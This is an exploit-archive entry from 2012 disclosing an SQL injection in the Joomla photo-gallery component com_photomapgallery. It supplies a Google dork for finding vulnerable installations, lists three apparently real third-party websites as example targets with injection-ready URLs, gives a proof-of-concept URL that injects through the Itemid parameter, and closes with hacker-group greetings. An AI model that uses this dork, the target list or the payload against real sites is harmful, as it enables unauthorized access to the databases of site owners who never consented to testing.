id: 18035
date: 04/10/2012
title: Joomla component (com_photomapgallery) SQL injection Vulnerability
author: xDarkSton3x
cves: 

##################################################
# Exploit Title: joomla component (com_photomapgallery) SQL injection Vulnerability
# Download : http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Google dork: inurl:com_photomapgallery
# Example Sites : 
http://www.pci.org.py/index.php?option=com_photomapgallery&view=photogallery&id=&Itemid='
http://www.schenksa.ch/index.php?option=com_photomapgallery&view=photogallery&id=3:giratoire-rc1a-commune-de-crans-pres-celigny-2007&Itemid='
http://www.astromalaga.es/nuevaIaco/index.php?option=com_photomapgallery&view=photogallery&id=4%3ACentro+Privado+de+Investigaci%C3%B3n+Astron%C3%B3mica+de+Zaragoza&Itemid='


##################################################

[~]Exploit/p0c :
http://www.site.com/index.php?option=com_photomapgallery&view=photogallery&id=&Itemid='=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team  -  DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]



#  0day.today [2023-03-23]  #